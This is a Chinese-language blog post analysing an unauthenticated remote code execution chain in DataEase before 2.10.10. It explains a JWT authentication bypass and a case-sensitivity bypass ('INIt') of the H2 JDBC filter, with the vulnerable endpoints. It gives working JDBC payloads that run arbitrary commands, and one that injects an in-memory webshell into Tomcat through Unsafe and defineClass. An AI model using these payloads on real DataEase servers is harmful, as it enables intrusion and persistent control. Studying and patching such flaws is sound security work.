DataEase 远程代码执行漏洞分析

漏洞描述

DataEase 是一款开源的数据可视化分析工具,旨在帮助用户快速分析数据并洞察业务趋势,从而实现业务的改进与优化。

漏洞影响版本: DataEase < 2.10.10

漏洞详情: 在过滤H2 JDBC连接字符串时存在大小写绕过,攻击者可配合JWT鉴权逻辑缺陷,构造特定的JDBC连接字符串执行任意代码,造成前台远程代码执行。

环境搭建

下载一键安装包:

https://github.com/dataease/dataease/releases/download/v2.10.9/dataease-online-installer-v2.10.9-ce.tar.gz

  1. 解压并执行安装脚本

  2. 修改配置文件

    /opt/dataease2.0/docker-compose.yml

  • JAVA_DEBUG=true
  • 添加端口映射 5005:5005 开启调试模式

  1. 重启服务

    dectl restart

漏洞分析

https://github.com/dataease/dataease/commit/429f654733716bc0afc44c22effddcbede3c8de5

从这个commit里可以发现修复了两处地方:

JWT鉴权逻辑缺陷

位置: io.dataease.auth.filter.CommunityTokenFilter#doFilter

  1. 从请求头获取JWT:X-DE-TOKEN 获取jwt进行验证
  2. 验证异常处理: 验证异常后设置返回包但没有结束整个流程,会继续进入到 filterChain.doFilter
  3. 绕过条件: 如果单看这里的话实际上只要 X-DE-TOKEN 不为空即可通过权限校验流程

实际测试发现的问题:

第一个原因: 获取jwt的密钥是从jwt解析的uid然后通过uid获取用户密码再md5的值,如果获取的uid值不存在的话会直接异常,不会进入下面的异常,所以还是要一个存在的uid值。

第二个原因: TokenFilter过滤器也验证了 X-DE-TOKEN

位置: io.dataease.auth.filter.TokenFilter#doFilter

  • 仅验证了 X-DE-TOKEN 长度大于100
  • uid值不为空
  • 没有进行密钥验证

综合上述分析需要满足下列条件:

  • uid值需要为存在的值
  • X-DE-TOKEN 长度大于100
  • oid不需要都可以

官方安全公告:

https://github.com/dataease/dataease/security/advisories/GHSA-999m-jv2p-5h34

官方公告这里是填了oid的,其实可以不需要oid,随便写什么让生成的jwt长度大于100即可

H2 JDBC RCE大小写绕过分析

位置: io.dataease.datasource.type.H2#getJdbc

触发点:

  • /de2api/datasource/validate
  • /de2api/datasource/getSchema (POC一模一样)

直接登录后台即可发现这个功能点

不需要审计黑盒都可以测试出来,点击这两个功能即可构造出数据包。

绕过方法:

INIT 改为 INIt 即可绕过下面的过滤

漏洞利用

使用如下JDBC payload即可RCE:

jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIt=CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd)\;return "test"\;}'\;CALL EXEC ('touch /tmp/1')

内存马注入

最开始直接使用java-chains生成JDBCPayload发现不行,有两个原因:

1. JDK版本问题
DataEase2.10.9 JDK版本为21

2. Tomcat版本问题
使用的tomcat版本为10

折腾了一下最后使用如下JDBCPayload即可成功打入内存马(需注意转义问题):

jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIt=CREATE ALIAS AQWSSSAZ AS 'String shellexec(String abc) throws java.lang.Exception{byte[] standBytes=null\;String tomcatStr=""\;
java.lang.Class unsafeClass = java.lang.Class.forName("sun.misc.Unsafe")\;
java.lang.reflect.Field unsafeField = unsafeClass.getDeclaredField("theUnsafe")\;
unsafeField.setAccessible(true)\;
sun.misc.Unsafe unsafe = (sun.misc.Unsafe) unsafeField.get(null)\;
java.lang.Module module = java.lang.Object.class.getModule()\;
java.lang.Class cls = AQWSSSAZ.class\;
long offset = unsafe.objectFieldOffset(java.lang.Class.class.getDeclaredField("module"))\;
unsafe.getAndSetObject(cls, offset, module)\;
java.lang.reflect.Method defineClass = java.lang.ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, java.lang.Integer.TYPE, java.lang.Integer.TYPE)\;
defineClass.setAccessible(true)\;
byte[] bytecode = java.util.Base64.getDecoder().decode(tomcatStr)\;
java.lang.Class clazz = (java.lang.Class) defineClass.invoke(java.lang.Thread.currentThread().getContextClassLoader(), bytecode, 0, bytecode.length)\;
clazz.newInstance()\;return "test"\;}'\;CALL AQWSSSAZ('123')

tomcatStr使用jmg生成

本文仅供安全研究和学习使用,由于传播、利用此文档提供的信息而造成任何直接或间接的后果及损害,均由使用本人负责,公众号及文章作者不为此承担任何责任。

posted @ 2025-06-30 14:24  cwkiller  阅读(1265)  评论(0)    收藏  举报